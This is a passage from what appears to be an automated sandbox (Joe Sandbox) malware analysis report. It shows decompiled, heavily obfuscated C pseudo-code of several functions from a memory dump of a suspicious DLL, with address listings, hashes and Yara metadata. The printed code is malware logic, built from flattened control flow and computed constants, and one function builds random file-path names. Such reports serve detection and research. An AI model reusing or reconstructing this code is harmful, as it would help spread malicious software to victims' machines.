				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int* _t264;

				_t230 = _a4;
				_push(_a8);
				_t252 = __ecx;
				_push(_t230);
				_push(__ecx);
				E02AFFE29(_t197);
				_v16 = 0x43fd88;
				_t264 =  &(( &_v84)[4]);
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x043fd881;
				_t253 = 0;
				_v36 = 0xa6c090;
				_t232 = 0x483ab52;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 + 0x55d4;
				_v36 = _v36 ^ 0x00005b0b;
				_v48 = 0x2dc4d8;
				_t254 = 0xf;
				_v48 = _v48 / _t254;
				_v48 = _v48 + 0x1bd9;
				_v48 = _v48 ^ 0x0001e475;
				_v80 = 0x1961e0;
				_v80 = _v80 | 0x2e5a3b97;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00050c56;
				_v52 = 0x801119;
				_t255 = 0x4c;
				_v52 = _v52 * 0x3b;
				_v52 = _v52 / _t255;
				_v52 = _v52 ^ 0x006b0701;
				_v12 = 0x5b3baf;
				_v12 = _v12 + 0xffffe0d8;
				_v12 = _v12 ^ 0x0050d6d6;
				_v20 = 0xddf3bb;
				_v20 = _v20 + 0x1688;
				_v20 = _v20 ^ 0x00da105f;
				_v84 = 0xb842b2;
				_v84 = _v84 >> 3;
				_t256 = 0x6e;
				_v84 = _v84 * 0x79;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x571ab13d;
				_v56 = 0xc043e1;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x181f9cd5;
				_v56 = _v56 ^ 0x181bbe52;
				_v24 = 0xd2b7cf;
				_v24 = _v24 / _t256;
				_v24 = _v24 ^ 0x00057f60;
				_v60 = 0x8a3800;
				_v60 = _v60 >> 6;
				_v60 = _v60 | 0x8f8b2365;
				_v60 = _v60 ^ 0x8f8e0970;
				_v64 = 0xc9e96d;
				_v64 = _v64 << 0x10;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x2da69c1f;
				_v68 = 0x328e52;
				_v68 = _v68 * 0x66;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0xa1266097;
				_v28 = 0xf9277c;
				_v28 = _v28 << 0xa;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x24e98be4;
				_v72 = 0xc9ae08;
				_v72 = _v72 | 0xbe9fb7a8;
				_v72 = _v72 << 1;
				_v72 = _v72 + 0xffff17b5;
				_v72 = _v72 ^ 0x7db3cb0d;
				_v32 = 0x7a6981;
				_v32 = _v32 ^ 0xd4fdb142;
				_t257 = 0x69;
				_v32 = _v32 / _t257;
				_v32 = _v32 ^ 0x020955a0;
				_v76 = 0x732b21;
				_t258 = 0x5e;
				_v76 = _v76 / _t258;
				_t259 = 0xb;
				_v76 = _v76 / _t259;
				_v76 = _v76 + 0xb8c3;
				_v76 = _v76 ^ 0x0005bc70;
				_v8 = 0x8f6a69;
				_t260 = 0x5d;
				_v8 = _v8 / _t260;
				_v8 = _v8 ^ 0x000b5b39;
				_v40 = 0x75e3f0;
				_t261 = 0x55;
				_v40 = _v40 / _t261;
				_v40 = _v40 + 0xffff98ec;
				_v40 = _v40 ^ 0x0009f0a2;
				_v44 = 0x50946;
				_v44 = _v44 * 0x76;
				_v44 = _v44 + 0xffff2591;
				_v44 = _v44 ^ 0x0253dc14;
				do {
					while(_t232 != 0x483ab52) {
						if(_t232 == 0x71a4461) {
							_t220 = E02AFA1C0(_v48, _t232, _v80, _v52, _v12,  &_v4, _v16, _v20, _v84, 0, _t232, _v56, _t252);
							_t264 =  &(_t264[0xc]);
							if(_t220 != 0) {
								_t232 = 0xc565723;
								continue;
							}
						} else {
							if(_t232 == 0xc565723) {
								_push(_t232);
								_push(_t232);
								_t253 = E02AEC5D8(_v4);
								_t264 =  &(_t264[3]);
								if(_t253 != 0) {
									_t232 = 0xf0f9d9d;
									continue;
								}
							} else {
								if(_t232 != 0xf0f9d9d) {
									goto L12;
								} else {
									E02AFA1C0(_v28, _t232, _v72, _v32, _v76,  &_v4, _v36, _v8, _v40, _t253, _t232, _v44, _t252);
									 *_t230 = _v4;
								}
							}
						}
						L6:
						return _t253;
					}
					_t232 = 0x71a4461;
					L12:
				} while (_t232 != 0xd0fff7e);
				goto L6;
			}







































                                                                                                          0x02aff844
                                                                                                          0x02aff84b
                                                                                                          0x02aff84f
                                                                                                          0x02aff851
                                                                                                          0x02aff853
                                                                                                          0x02aff854
                                                                                                          0x02aff859
                                                                                                          0x02aff861
                                                                                                          0x02aff864
                                                                                                          0x02aff86b
                                                                                                          0x02aff873
                                                                                                          0x02aff875
                                                                                                          0x02aff87d
                                                                                                          0x02aff882
                                                                                                          0x02aff887
                                                                                                          0x02aff88f
                                                                                                          0x02aff897
                                                                                                          0x02aff8a5
                                                                                                          0x02aff8aa
                                                                                                          0x02aff8b0
                                                                                                          0x02aff8b8
                                                                                                          0x02aff8c0
                                                                                                          0x02aff8c8
                                                                                                          0x02aff8d0
                                                                                                          0x02aff8d5
                                                                                                          0x02aff8da
                                                                                                          0x02aff8e2
                                                                                                          0x02aff8ef
                                                                                                          0x02aff8f2
                                                                                                          0x02aff8fe
                                                                                                          0x02aff902
                                                                                                          0x02aff90a
                                                                                                          0x02aff912
                                                                                                          0x02aff91a
                                                                                                          0x02aff922
                                                                                                          0x02aff92a
                                                                                                          0x02aff932
                                                                                                          0x02aff93a
                                                                                                          0x02aff942
                                                                                                          0x02aff94c
                                                                                                          0x02aff94d
                                                                                                          0x02aff951
                                                                                                          0x02aff956
                                                                                                          0x02aff95e
                                                                                                          0x02aff966
                                                                                                          0x02aff96b
                                                                                                          0x02aff973
                                                                                                          0x02aff97b
                                                                                                          0x02aff989
                                                                                                          0x02aff98d
                                                                                                          0x02aff995
                                                                                                          0x02aff99d
                                                                                                          0x02aff9a2
                                                                                                          0x02aff9aa
                                                                                                          0x02aff9b2
                                                                                                          0x02aff9ba
                                                                                                          0x02aff9bf
                                                                                                          0x02aff9c4
                                                                                                          0x02aff9cc
                                                                                                          0x02aff9d9
                                                                                                          0x02aff9dd
                                                                                                          0x02aff9e2
                                                                                                          0x02aff9ec
                                                                                                          0x02aff9f4
                                                                                                          0x02aff9f9
                                                                                                          0x02aff9fe
                                                                                                          0x02affa06
                                                                                                          0x02affa0e
                                                                                                          0x02affa16
                                                                                                          0x02affa1a
                                                                                                          0x02affa22
                                                                                                          0x02affa2a
                                                                                                          0x02affa32
                                                                                                          0x02affa40
                                                                                                          0x02affa45
                                                                                                          0x02affa4b
                                                                                                          0x02affa53
                                                                                                          0x02affa5f
                                                                                                          0x02affa64
                                                                                                          0x02affa6e
                                                                                                          0x02affa73
                                                                                                          0x02affa79
                                                                                                          0x02affa81
                                                                                                          0x02affa89
                                                                                                          0x02affa95
                                                                                                          0x02affa9a
                                                                                                          0x02affaa0
                                                                                                          0x02affaa8
                                                                                                          0x02affab4
                                                                                                          0x02affabc
                                                                                                          0x02affac0
                                                                                                          0x02affac8
                                                                                                          0x02affad0
                                                                                                          0x02affadd
                                                                                                          0x02affae1
                                                                                                          0x02affae9
                                                                                                          0x02affaf1
                                                                                                          0x02affaf1
                                                                                                          0x02affaff
                                                                                                          0x02affbb5
                                                                                                          0x02affbba
                                                                                                          0x02affbbf
                                                                                                          0x02affbc1
                                                                                                          0x00000000
                                                                                                          0x02affbc1
                                                                                                          0x02affb05
                                                                                                          0x02affb0b
                                                                                                          0x02affb6d
                                                                                                          0x02affb6e
                                                                                                          0x02affb78
                                                                                                          0x02affb7a
                                                                                                          0x02affb7f
                                                                                                          0x02affb81
                                                                                                          0x00000000
                                                                                                          0x02affb81
                                                                                                          0x02affb0d
                                                                                                          0x02affb13
                                                                                                          0x00000000
                                                                                                          0x02affb19
                                                                                                          0x02affb42
                                                                                                          0x02affb51
                                                                                                          0x02affb51
                                                                                                          0x02affb13
                                                                                                          0x02affb0b
                                                                                                          0x02affb54
                                                                                                          0x02affb5c
                                                                                                          0x02affb5c
                                                                                                          0x02affbcb
                                                                                                          0x02affbcd
                                                                                                          0x02affbcd
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !+s
                                                                                                          • API String ID: 0-2041718826
                                                                                                          • Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
                                                                                                          • Instruction ID: c46cd25bea2df82423e0326c677ffbf7c583d68bd32a6d72e92ba592471bb856
                                                                                                          • Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
                                                                                                          • Instruction Fuzzy Hash: D19111720083449FD758CF65C98991BFBE1FBC4B58F40892DF69686260D7B6C949CF82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B00A64, Relevance: 1.4, Strings: 1, Instructions: 197COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 93%
                                                                                                          			E02B00A64(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t180;
				void* _t211;
				void* _t212;
				void* _t214;
				void* _t238;
				void* _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int* _t250;

				_push(_a8);
				_t238 = __edx;
				_t212 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t180);
				_v56 = 0xc0d7de;
				_t250 =  &(( &_v76)[4]);
				_v56 = _v56 << 2;
				_v56 = _v56 << 7;
				_t239 = 0;
				_v56 = _v56 ^ 0x81afbc01;
				_t214 = 0xaac46ca;
				_v64 = 0x3a8e28;
				_v64 = _v64 >> 1;
				_v64 = _v64 + 0xe78e;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000000f0;
				_v16 = 0x168660;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x4000b433;
				_v8 = 0x28d09b;
				_t240 = 0x6c;
				_v8 = _v8 / _t240;
				_v8 = _v8 ^ 0x400060bf;
				_v72 = 0xacfd47;
				_v72 = _v72 ^ 0xaf3d897a;
				_v72 = _v72 << 2;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x5f2a69ef;
				_v60 = 0xaad3e;
				_v60 = _v60 >> 7;
				_v60 = _v60 + 0x530f;
				_v60 = _v60 ^ 0x00047061;
				_v20 = 0xd1ee8e;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x00058db8;
				_v76 = 0xa228f;
				_t241 = 0x1c;
				_v76 = _v76 / _t241;
				_t242 = 0x30;
				_v76 = _v76 * 0x79;
				_v76 = _v76 | 0xd88c69ec;
				_v76 = _v76 ^ 0xd8a0fe12;
				_v24 = 0xd67a62;
				_v24 = _v24 + 0xffff00ae;
				_v24 = _v24 ^ 0x00d8581e;
				_v40 = 0xcb2b10;
				_v40 = _v40 / _t242;
				_t243 = 0x14;
				_v40 = _v40 / _t243;
				_v40 = _v40 ^ 0x0006cc26;
				_v44 = 0xf09ad;
				_v44 = _v44 << 0xd;
				_v44 = _v44 | 0x1b12e533;
				_v44 = _v44 ^ 0xfb3e9f34;
				_v48 = 0xeb0c29;
				_v48 = _v48 * 0x7b;
				_t244 = 0x65;
				_v48 = _v48 / _t244;
				_v48 = _v48 ^ 0x0113d763;
				_v52 = 0x64962b;
				_v52 = _v52 + 0xfffff671;
				_v52 = _v52 + 0x8f00;
				_v52 = _v52 ^ 0x00671ded;
				_v28 = 0xef32a4;
				_v28 = _v28 + 0xf3f6;
				_t245 = 0x57;
				_v28 = _v28 / _t245;
				_v28 = _v28 ^ 0x000c1b67;
				_v32 = 0x4955c4;
				_v32 = _v32 << 7;
				_t246 = 0x75;
				_v32 = _v32 / _t246;
				_v32 = _v32 ^ 0x005efa9b;
				_v68 = 0x926f14;
				_v68 = _v68 ^ 0x2f6794d2;
				_t247 = 0x7f;
				_v68 = _v68 / _t247;
				_v68 = _v68 + 0xe0be;
				_v68 = _v68 ^ 0x00650f61;
				_v12 = 0xa3b92d;
				_v12 = _v12 + 0xffff94bd;
				_v12 = _v12 ^ 0x00ae9057;
				_v36 = 0x571707;
				_v36 = _v36 << 3;
				_v36 = _v36 + 0xffff7ee3;
				_v36 = _v36 ^ 0x02b89578;
				do {
					while(_t214 != 0x665f559) {
						if(_t214 == 0x8e4e5a6) {
							_push(_t214);
							_push(_t214);
							_t239 = E02AEC5D8(_v4 + _v4);
							_t250 =  &(_t250[3]);
							if(_t239 != 0) {
								_t214 = 0x665f559;
								continue;
							}
						} else {
							if(_t214 == 0xa67d5aa) {
								_t211 = E02AFC4F8(_v72, _v16 | _v56, _t212, 0, _v60, _v20, _v76, _v24,  &_v4, _t238);
								_t250 =  &(_t250[8]);
								if(_t211 != 0) {
									_t214 = 0x8e4e5a6;
									continue;
								}
							} else {
								if(_t214 != 0xaac46ca) {
									goto L11;
								} else {
									_t214 = 0xa67d5aa;
									continue;
								}
							}
						}
						goto L12;
					}
					E02AFC4F8(_v28, _v8 | _v64, _t212, _t239, _v32, _v68, _v12, _v36,  &_v4, _t238);
					_t250 =  &(_t250[8]);
					_t214 = 0xee0867e;
					L11:
				} while (_t214 != 0xee0867e);
				L12:
				return _t239;
			}





































                                                                                                          0x02b00a6b
                                                                                                          0x02b00a6f
                                                                                                          0x02b00a71
                                                                                                          0x02b00a73
                                                                                                          0x02b00a77
                                                                                                          0x02b00a78
                                                                                                          0x02b00a79
                                                                                                          0x02b00a7e
                                                                                                          0x02b00a86
                                                                                                          0x02b00a89
                                                                                                          0x02b00a90
                                                                                                          0x02b00a95
                                                                                                          0x02b00a97
                                                                                                          0x02b00a9f
                                                                                                          0x02b00aa4
                                                                                                          0x02b00aac
                                                                                                          0x02b00ab0
                                                                                                          0x02b00ab8
                                                                                                          0x02b00abd
                                                                                                          0x02b00ac5
                                                                                                          0x02b00acd
                                                                                                          0x02b00ad2
                                                                                                          0x02b00ada
                                                                                                          0x02b00ae8
                                                                                                          0x02b00aed
                                                                                                          0x02b00af3
                                                                                                          0x02b00afb
                                                                                                          0x02b00b03
                                                                                                          0x02b00b0b
                                                                                                          0x02b00b10
                                                                                                          0x02b00b14
                                                                                                          0x02b00b1c
                                                                                                          0x02b00b24
                                                                                                          0x02b00b29
                                                                                                          0x02b00b31
                                                                                                          0x02b00b39
                                                                                                          0x02b00b41
                                                                                                          0x02b00b46
                                                                                                          0x02b00b4e
                                                                                                          0x02b00b5a
                                                                                                          0x02b00b5f
                                                                                                          0x02b00b6a
                                                                                                          0x02b00b6d
                                                                                                          0x02b00b71
                                                                                                          0x02b00b79
                                                                                                          0x02b00b81
                                                                                                          0x02b00b89
                                                                                                          0x02b00b91
                                                                                                          0x02b00b99
                                                                                                          0x02b00ba9
                                                                                                          0x02b00bb1
                                                                                                          0x02b00bb4
                                                                                                          0x02b00bb8
                                                                                                          0x02b00bc0
                                                                                                          0x02b00bc8
                                                                                                          0x02b00bcd
                                                                                                          0x02b00bd5
                                                                                                          0x02b00bdd
                                                                                                          0x02b00bea
                                                                                                          0x02b00bf6
                                                                                                          0x02b00bfb
                                                                                                          0x02b00c01
                                                                                                          0x02b00c09
                                                                                                          0x02b00c11
                                                                                                          0x02b00c19
                                                                                                          0x02b00c21
                                                                                                          0x02b00c29
                                                                                                          0x02b00c31
                                                                                                          0x02b00c3d
                                                                                                          0x02b00c42
                                                                                                          0x02b00c48
                                                                                                          0x02b00c50
                                                                                                          0x02b00c58
                                                                                                          0x02b00c61
                                                                                                          0x02b00c66
                                                                                                          0x02b00c6c
                                                                                                          0x02b00c74
                                                                                                          0x02b00c7c
                                                                                                          0x02b00c88
                                                                                                          0x02b00c90
                                                                                                          0x02b00c94
                                                                                                          0x02b00c9c
                                                                                                          0x02b00ca4
                                                                                                          0x02b00cac
                                                                                                          0x02b00cb4
                                                                                                          0x02b00cbc
                                                                                                          0x02b00cc4
                                                                                                          0x02b00cc9
                                                                                                          0x02b00cd1
                                                                                                          0x02b00cd9
                                                                                                          0x02b00cd9
                                                                                                          0x02b00ce7
                                                                                                          0x02b00d50
                                                                                                          0x02b00d51
                                                                                                          0x02b00d5a
                                                                                                          0x02b00d5c
                                                                                                          0x02b00d61
                                                                                                          0x02b00d63
                                                                                                          0x00000000
                                                                                                          0x02b00d63
                                                                                                          0x02b00ce9
                                                                                                          0x02b00cef
                                                                                                          0x02b00d29
                                                                                                          0x02b00d2e
                                                                                                          0x02b00d33
                                                                                                          0x02b00d35
                                                                                                          0x00000000
                                                                                                          0x02b00d35
                                                                                                          0x02b00cf1
                                                                                                          0x02b00cf7
                                                                                                          0x00000000
                                                                                                          0x02b00cfd
                                                                                                          0x02b00cfd
                                                                                                          0x00000000
                                                                                                          0x02b00cfd
                                                                                                          0x02b00cf7
                                                                                                          0x02b00cef
                                                                                                          0x00000000
                                                                                                          0x02b00ce7
                                                                                                          0x02b00d8e
                                                                                                          0x02b00d93
                                                                                                          0x02b00d96
                                                                                                          0x02b00d9b
                                                                                                          0x02b00d9b
                                                                                                          0x02b00da8
                                                                                                          0x02b00db0

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: i*_
                                                                                                          • API String ID: 0-4175851924
                                                                                                          • Opcode ID: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
                                                                                                          • Instruction ID: fbbbe0b91565c34405c8a4917a4bd91429bbcbc7c01df34240ed8388d56808ff
                                                                                                          • Opcode Fuzzy Hash: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
                                                                                                          • Instruction Fuzzy Hash: 0F8151721083409FD354CF61D989A1BFBE2EBC4B58F00891DF9929A2A0D7B6C909CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFC5D5, Relevance: 1.4, Strings: 1, Instructions: 194COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 77%
                                                                                                          			E02AFC5D5() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _t190;
				signed int _t195;
				void* _t198;
				void* _t217;
				intOrPtr _t220;
				void* _t221;
				short* _t222;
				void* _t223;
				short* _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				void* _t232;

				_t220 =  *0x2b06214; // 0x0
				_v28 = 0x163a95;
				_t221 = _t220 + 0x23c;
				_t198 = 0x1db3eac;
				_t225 = 0x2a;
				_v28 = _v28 * 0x43;
				_v28 = _v28 | 0x78fa3d4f;
				_v28 = _v28 + 0xb7b9;
				_v28 = _v28 ^ 0x7df609b0;
				_v36 = 0x641eba;
				_v36 = _v36 / _t225;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x02679a20;
				_v60 = 0x1f128d;
				_v60 = _v60 | 0x723f4715;
				_v60 = _v60 ^ 0x7234fc66;
				_v8 = 0xac331e;
				_v8 = _v8 ^ 0xe591128e;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0xffffc28e;
				_v8 = _v8 ^ 0x53d02dfe;
				_v32 = 0x5bb4ea;
				_v32 = _v32 ^ 0xe8579be7;
				_v32 = _v32 + 0xffff04e9;
				_v32 = _v32 ^ 0xe8074079;
				_v40 = 0xd0bea7;
				_v40 = _v40 << 1;
				_t226 = 0x1d;
				_v40 = _v40 / _t226;
				_v40 = _v40 ^ 0x000c7110;
				_v64 = 0x41c151;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x00828c11;
				_v44 = 0x3034cc;
				_t227 = 0x1a;
				_v44 = _v44 / _t227;
				_v44 = _v44 + 0xffffde13;
				_v44 = _v44 ^ 0x000cb2d3;
				_v12 = 0xb1859b;
				_v12 = _v12 ^ 0xe04d3b3c;
				_t228 = 0x25;
				_v12 = _v12 * 7;
				_v12 = _v12 | 0x0065acf4;
				_v12 = _v12 ^ 0x26e71960;
				_v68 = 0x4e3808;
				_v68 = _v68 | 0x4ec02654;
				_v68 = _v68 ^ 0x4ec4b15d;
				_v48 = 0x7afa7b;
				_v48 = _v48 ^ 0xc20923f7;
				_v48 = _v48 / _t228;
				_v48 = _v48 ^ 0x0544c062;
				_v20 = 0x2ff9aa;
				_v20 = _v20 + 0xffffa865;
				_v20 = _v20 * 0x24;
				_v20 = _v20 + 0x4632;
				_v20 = _v20 ^ 0x06bd6615;
				_v16 = 0x2d8807;
				_v16 = _v16 * 0x5f;
				_v16 = _v16 << 3;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0xcaf714e8;
				_v52 = 0xcb8ac1;
				_v52 = _v52 << 0xb;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x000dc079;
				_v24 = 0xed824f;
				_v24 = _v24 + 0x6e9c;
				_t229 = 0x19;
				_v24 = _v24 / _t229;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x00044037;
				_v56 = 0xd4fc47;
				_v56 = _v56 << 5;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xfc4a9c10;
				_v72 = 0x35720e;
				_v72 = _v72 ^ 0x5bf10d31;
				_v72 = _v72 ^ 0x5bc050cb;
				do {
					while(_t198 != 0x1db3eac) {
						if(_t198 == 0x2b86adf) {
							E02AEE404(_v56, 1, _v72, 3, _t221);
							 *((short*)(_t221 + 6)) = 0;
							return 0;
						}
						if(_t198 == 0x6ec99df) {
							_push(_t198);
							_push(_t198);
							_t230 = E02AFCCA0(4, 0x10);
							E02AEE404(_v52, 1, _v24, _t230, _t221);
							_t232 = _t232 + 0x1c;
							_t222 = _t221 + _t230 * 2;
							_t198 = 0x2b86adf;
							_t190 = 0x2e;
							 *_t222 = _t190;
							_t221 = _t222 + 2;
							continue;
						}
						if(_t198 != 0x6f740c2) {
							goto L8;
						}
						_push(_t198);
						_push(_t198);
						_t195 = E02AFCCA0(4, 0x10);
						_push(_t221);
						_push(1);
						_push(_v64);
						_t231 = _t195;
						_t217 = 2;
						E02AEE404(_v40, _t217);
						_t223 = _t221 + 2;
						E02AEE404(_v44, 1, _v12, _t231, _t223);
						_t232 = _t232 + 0x28;
						_t224 = _t223 + _t231 * 2;
						_t198 = 0x6ec99df;
						_t190 = 0x5c;
						 *_t224 = _t190;
						_t221 = _t224 + 2;
					}
					E02AEDC1B(_t198);
					_t198 = 0x6f740c2;
					L8:
				} while (_t198 != 0x41dad81);
				return _t190;
			}





































                                                                                                          0x02afc5dd
                                                                                                          0x02afc5e5
                                                                                                          0x02afc5ec
                                                                                                          0x02afc5f6
                                                                                                          0x02afc5fd
                                                                                                          0x02afc600
                                                                                                          0x02afc603
                                                                                                          0x02afc60a
                                                                                                          0x02afc611
                                                                                                          0x02afc618
                                                                                                          0x02afc626
                                                                                                          0x02afc629
                                                                                                          0x02afc62d
                                                                                                          0x02afc634
                                                                                                          0x02afc63b
                                                                                                          0x02afc642
                                                                                                          0x02afc649
                                                                                                          0x02afc650
                                                                                                          0x02afc657
                                                                                                          0x02afc65b
                                                                                                          0x02afc662
                                                                                                          0x02afc669
                                                                                                          0x02afc670
                                                                                                          0x02afc677
                                                                                                          0x02afc67e
                                                                                                          0x02afc685
                                                                                                          0x02afc68c
                                                                                                          0x02afc692
                                                                                                          0x02afc697
                                                                                                          0x02afc69c
                                                                                                          0x02afc6a3
                                                                                                          0x02afc6aa
                                                                                                          0x02afc6ad
                                                                                                          0x02afc6b4
                                                                                                          0x02afc6be
                                                                                                          0x02afc6c3
                                                                                                          0x02afc6c8
                                                                                                          0x02afc6cf
                                                                                                          0x02afc6d6
                                                                                                          0x02afc6dd
                                                                                                          0x02afc6e8
                                                                                                          0x02afc6e9
                                                                                                          0x02afc6ec
                                                                                                          0x02afc6f3
                                                                                                          0x02afc6fa
                                                                                                          0x02afc701
                                                                                                          0x02afc708
                                                                                                          0x02afc70f
                                                                                                          0x02afc716
                                                                                                          0x02afc722
                                                                                                          0x02afc725
                                                                                                          0x02afc72c
                                                                                                          0x02afc733
                                                                                                          0x02afc73e
                                                                                                          0x02afc741
                                                                                                          0x02afc748
                                                                                                          0x02afc74f
                                                                                                          0x02afc75a
                                                                                                          0x02afc75d
                                                                                                          0x02afc761
                                                                                                          0x02afc767
                                                                                                          0x02afc76e
                                                                                                          0x02afc775
                                                                                                          0x02afc779
                                                                                                          0x02afc77d
                                                                                                          0x02afc784
                                                                                                          0x02afc78b
                                                                                                          0x02afc797
                                                                                                          0x02afc79a
                                                                                                          0x02afc79d
                                                                                                          0x02afc7a1
                                                                                                          0x02afc7a8
                                                                                                          0x02afc7af
                                                                                                          0x02afc7b3
                                                                                                          0x02afc7b7
                                                                                                          0x02afc7be
                                                                                                          0x02afc7c5
                                                                                                          0x02afc7cc
                                                                                                          0x02afc7d3
                                                                                                          0x02afc7d3
                                                                                                          0x02afc7e5
                                                                                                          0x02afc8bb
                                                                                                          0x02afc8c5
                                                                                                          0x00000000
                                                                                                          0x02afc8c5
                                                                                                          0x02afc7f1
                                                                                                          0x02afc85e
                                                                                                          0x02afc85f
                                                                                                          0x02afc869
                                                                                                          0x02afc876
                                                                                                          0x02afc87b
                                                                                                          0x02afc87e
                                                                                                          0x02afc881
                                                                                                          0x02afc888
                                                                                                          0x02afc889
                                                                                                          0x02afc88c
                                                                                                          0x00000000
                                                                                                          0x02afc88c
                                                                                                          0x02afc7f9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afc80b
                                                                                                          0x02afc80c
                                                                                                          0x02afc811
                                                                                                          0x02afc816
                                                                                                          0x02afc817
                                                                                                          0x02afc819
                                                                                                          0x02afc81f
                                                                                                          0x02afc823
                                                                                                          0x02afc824
                                                                                                          0x02afc829
                                                                                                          0x02afc837
                                                                                                          0x02afc83c
                                                                                                          0x02afc83f
                                                                                                          0x02afc842
                                                                                                          0x02afc849
                                                                                                          0x02afc84a
                                                                                                          0x02afc84d
                                                                                                          0x02afc84d
                                                                                                          0x02afc897
                                                                                                          0x02afc89c
                                                                                                          0x02afc8a1
                                                                                                          0x02afc8a1
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <;M
                                                                                                          • API String ID: 0-164005337
                                                                                                          • Opcode ID: 733b477c76834a540cb79f76cec4dae7f33d8ffec2725c8f1dcbf1042fde8f72
                                                                                                          • Instruction ID: 12757ae962ce8421c1a67691f219dbf710d1ea90b0428ce38e3762d6cde71926
                                                                                                          • Opcode Fuzzy Hash: 733b477c76834a540cb79f76cec4dae7f33d8ffec2725c8f1dcbf1042fde8f72
                                                                                                          • Instruction Fuzzy Hash: B4916A71D0021DEBDB54CFA5D98A9EEBBB2FF44314F20805AE612BB250C7B41A46CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE1F38, Relevance: 1.4, Strings: 1, Instructions: 134COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 90%
                                                                                                          			E02AE1F38(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				char _v556;
				intOrPtr _v564;
				char _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				void* _t89;
				signed int _t97;
				intOrPtr _t102;
				signed int _t104;
				char* _t105;
				void* _t119;
				signed int* _t125;

				_push(E02AEE5C0);
